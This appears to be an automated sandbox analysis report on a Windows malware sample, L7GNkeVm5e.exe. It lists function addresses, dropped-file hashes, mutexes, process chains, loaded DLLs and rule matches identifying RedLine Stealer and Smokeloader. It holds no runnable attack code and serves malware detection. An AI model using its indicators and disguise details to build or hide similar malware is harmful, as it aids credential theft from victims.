    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004060002_2_00406000
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043080E2_2_0043080E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043F8202_2_0043F820
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041D0C02_2_0041D0C0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004418A02_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041194F2_2_0041194F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043F1502_2_0043F150
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042B1702_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004039002_2_00403900
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004251002_2_00425100
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004399232_2_00439923
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004271332_2_00427133
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004339302_2_00433930
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004121DB2_2_004121DB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042A9F72_2_0042A9F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040E9B02_2_0040E9B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041825B2_2_0041825B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042EA622_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040CA622_2_0040CA62
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00442A602_2_00442A60
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041DAD02_2_0041DAD0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00429ADE2_2_00429ADE
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00425AF02_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004092A02_2_004092A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00405AB02_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004042B02_2_004042B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043CB402_2_0043CB40
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042EB5F2_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004083602_2_00408360
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00428B672_2_00428B67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00437B692_2_00437B69
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00402B202_2_00402B20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00441B202_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00432B242_2_00432B24
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004063C02_2_004063C0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042DBF02_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004223802_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041BBA02_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042BBA02_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042EBA12_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042EBB32_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00441BB02_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00441C402_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004424702_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00426C762_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041D4002_2_0041D400
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041C4002_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004174052_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00414C202_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004324262_2_00432426
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004284372_2_00428437
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043443D2_2_0043443D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004354C42_2_004354C4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00434CEF2_2_00434CEF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043A4EF2_2_0043A4EF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004374AB2_2_004374AB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041DCB02_2_0041DCB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043ACB02_2_0043ACB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0042FCBC2_2_0042FCBC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040D5452_2_0040D545
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00425D6A2_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00435D132_2_00435D13
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00442D202_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043CD272_2_0043CD27
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00420D902_2_00420D90
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043C5A02_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00421E702_2_00421E70
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004366102_2_00436610
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004076202_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040AE302_2_0040AE30
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041F6D02_2_0041F6D0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00416ED02_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041BEE12_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00402EF02_2_00402EF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004186FC2_2_004186FC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00423EFF2_2_00423EFF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00431E8E2_2_00431E8E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041A6902_2_0041A690
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004157202_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0041AF242_2_0041AF24
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00427F302_2_00427F30
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040DFE22_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004257E02_2_004257E0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00429FE42_2_00429FE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0040CFEC2_2_0040CFEC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004097902_2_00409790
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_004427B02_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_00441FB02_2_00441FB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216D2532_2_0216D253
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216E2492_2_0216E249
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021662672_2_02166267
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218A3052_2_0218A305
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217D3272_2_0217D327
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021873B22_2_021873B2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219F3B72_2_0219F3B7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A20172_2_021A2017
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216B0972_2_0216B097
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021860B72_2_021860B7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021820D72_2_021820D7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021920F52_2_021920F5
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021631572_2_02163157
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217C1482_2_0217C148
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021841662_2_02184166
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021881972_2_02188197
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217B18B2_2_0217B18B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021666272_2_02166627
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217C6672_2_0217C667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217D6672_2_0217D667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219268D2_2_0219268D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021946A42_2_021946A4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A26D72_2_021A26D7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021977122_2_02197712
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219572B2_2_0219572B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219A7562_2_0219A756
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216D7AC2_2_0216D7AC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021724422_2_02172442
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021784C22_2_021784C2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021645172_2_02164517
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021695072_2_02169507
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021685C72_2_021685C7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021825E72_2_021825E7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A2A172_2_021A2A17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02190A752_2_02190A75
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219FA872_2_0219FA87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02166AB72_2_02166AB7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02179AA72_2_02179AA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219BAD72_2_0219BAD7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02168AE72_2_02168AE7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02177AE42_2_02177AE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02163B672_2_02163B67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02193B972_2_02193B97
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02199B8A2_2_02199B8A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02171BB62_2_02171BB6
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219C8072_2_0219C807
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021968772_2_02196877
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021678872_2_02167887
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217A8F72_2_0217A8F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217F9372_2_0217F937
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021699F72_2_021699F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218EE1A2_2_0218EE1A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218EE082_2_0218EE08
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218BE072_2_0218BE07
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218DE572_2_0218DE57
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02174E872_2_02174E87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217DF172_2_0217DF17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219AF172_2_0219AF17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218FF232_2_0218FF23
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02194F562_2_02194F56
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02195F7A2_2_02195F7A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A2F872_2_021A2F87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02177FFA2_2_02177FFA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02180FF72_2_02180FF7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216EC172_2_0216EC17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218ECC92_2_0218ECC9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_021A2CC72_2_021A2CC7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0216CCC92_2_0216CCC9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02165D172_2_02165D17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0217DD372_2_0217DD37
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02162D872_2_02162D87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02192D8B2_2_02192D8B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0219CDA72_2_0219CDA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_02197DD02_2_02197DD0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0218EDC62_2_0218EDC6
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: String function: 00410710 appears 53 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: String function: 02110977 appears 53 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: String function: 0211000F appears 121 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: String function: 0040FDA8 appears 125 times
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: String function: 0040F8F9 appears 36 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: String function: 00414C10 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: String function: 02174E77 appears 116 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: String function: 021683D7 appears 77 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: String function: 00408170 appears 45 times
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884
    Source: L7GNkeVm5e.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: L7GNkeVm5e.exeBinary or memory string: OriginalFileName vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe, 00000000.00000003.2103321400.0000000002170000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exe, 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs L7GNkeVm5e.exe
    Source: L7GNkeVm5e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: L7GNkeVm5e.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: EB86.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@11/3
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00629FB6 CreateToolhelp32Snapshot,Module32First,0_2_00629FB6
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 2_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_0043B870
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htmJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeMutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess412
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile created: C:\Users\user\AppData\Local\Temp\EB86.tmpJump to behavior
    Source: L7GNkeVm5e.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: L7GNkeVm5e.exeVirustotal: Detection: 39%
    Source: L7GNkeVm5e.exeReversingLabs: Detection: 50%
    Source: unknownProcess created: C:\Users\user\Desktop\L7GNkeVm5e.exe "C:\Users\user\Desktop\L7GNkeVm5e.exe"
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeProcess created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe"
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeProcess created: C:\Users\user\AppData\Local\Temp\EB86.tmp.exe "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe" Jump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeSection loaded: onecorecommonproxystub.dllJump to behavior
